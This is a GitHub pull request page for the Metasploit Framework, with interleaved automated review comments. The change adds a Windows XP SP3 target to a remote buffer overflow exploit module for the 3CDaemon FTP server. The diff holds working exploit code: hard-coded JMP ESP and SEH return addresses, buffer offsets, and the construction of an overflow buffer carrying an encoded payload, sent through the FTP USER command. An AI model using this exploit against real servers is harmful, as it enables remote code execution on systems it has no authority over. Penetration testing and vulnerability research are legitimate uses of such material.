Add Windows SP3 to targets for 3cdaemon FTP #268

Merged
merged 1 commit into from

2 participants

@olliwolli

Using jmp esp instead of seh for sp3

@wchen-r7 wchen-r7 merged commit 30a3d8b into rapid7:master
Commits on Mar 23, 2012
  1. @olliwolli

    Add Windows SP3 to targets.

    olliwolli authored
Showing with 34 additions and 7 deletions.
  1. +34 −7 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
41 modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
@@ -5,8 +5,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
##
require 'msf/core'
@@ -26,7 +26,11 @@ def initialize(info = {})
web site and is recommended in numerous support documents.
This module uses the USER command to trigger the overflow.
},
- 'Author' => [ 'hdm' ],
+ 'Author' =>
+ [
+ 'hdm', # Original author
+ 'otr' # Windows XP SP3
+ ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@@ -37,6 +41,11 @@ def initialize(info = {})
[ 'BID', '12155'],
[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'seh',
+ 'target' => 0
+ },
'Privileged' => false,
'Payload' =>
{
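Review bot: 'target' => 0 inside 'DefaultOptions' is not the usual way to select a default target; the module-info key for that is 'DefaultTarget' => 0 at the same level as 'Privileged', and since target 0 is already what the framework picks when no target is set, the entry is redundant. Separately, 'EXITFUNC' => 'seh' now applies to every target, including the new JMP ESP target introduced later in this change, which never passes through the exception dispatcher; 'thread' or 'process' is the more appropriate default for that path, or set the exit function per target rather than module-wide.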
@@ -55,6 +64,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x75022ac4, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -62,6 +72,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x71aa32ad, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -69,6 +80,7 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x77681799, # ws2help.dll
+ 'Offset' => 229,
},
],
[
@@ -76,9 +88,18 @@ def initialize(info = {})
{
'Platform' => 'win',
'Ret' => 0x775F29D0,
+ 'Offset' => 229,
+ },
+ ],
+ [
+ 'Windows XP English SP3',
+ {
+ 'Platform' => 'win',
+ 'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
+ #'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
+ 'Offset' => 245,
},
],
-
],
'DisclosureDate' => 'Jan 4 2005'))
end
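Review bot: the commented-out line `#'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1` is dead code; either drop it or promote it to a real 'Windows XP English SP1' target entry, since a commented hash key can never be selected. Two style points in the same block: the new addresses are written in upper-case hex (0x7CBD41FB) while the existing targets use lower-case (0x75022ac4, 0x71aa32ad), and the comment repeats the address it annotates, so `# JMP ESP in shell32 (XP SP3)` conveys the same with nothing to keep in sync. The existing targets name the module their 'Ret' comes from as `ws2help.dll`; naming the file the same way here (rather than `shell32.data`) would keep the table consistent. Removing the blank line before the closing `],` is a harmless cleanup.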
@@ -97,9 +118,15 @@ def exploit
print_status("Trying target #{target.name}...")
- buf = rand_text_english(2048, payload_badchars)
- seh = generate_seh_payload(target.ret)
- buf[229, seh.length] = seh
+ if (target == targets[4])
+ buf = rand_text_english(target['Offset'], payload_badchars)
+ buf << [ target['Ret'] ].pack('V') * 2
+ buf << payload.encoded
+ else
+ buf = rand_text_english(2048, payload_badchars)
+ seh = generate_seh_payload(target.ret)
+ buf[target['Offset'], seh.length] = seh
+ end
send_cmd( ['USER', buf] , false )
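Review bot: `target == targets[4]` ties the JMP ESP branch to the position of the SP3 entry in the targets array, so inserting or reordering a target later silently routes SP3 through the SEH branch (and whichever target lands at index 4 through the JMP ESP one). Key the decision on the target itself instead, for example a per-target marker in the target hash checked with `if target['Type'] == 'jmpesp'`, or at minimum `target.name =~ /SP3/`. In the JMP ESP branch, `buf << [ target['Ret'] ].pack('V') * 2` leaves a second copy of the return address at the top of the stack when `JMP ESP` lands, so those four bytes are decoded as instructions ahead of `payload.encoded`; if that is deliberate, a comment should say why, otherwise a single copy is clearer. Also, the SEH branch keeps a fixed 2048-byte buffer while the new branch's total length now depends on the encoded payload size, and neither branch checks that length against the module's 'Payload' options, which is worth confirming for the SP3 case.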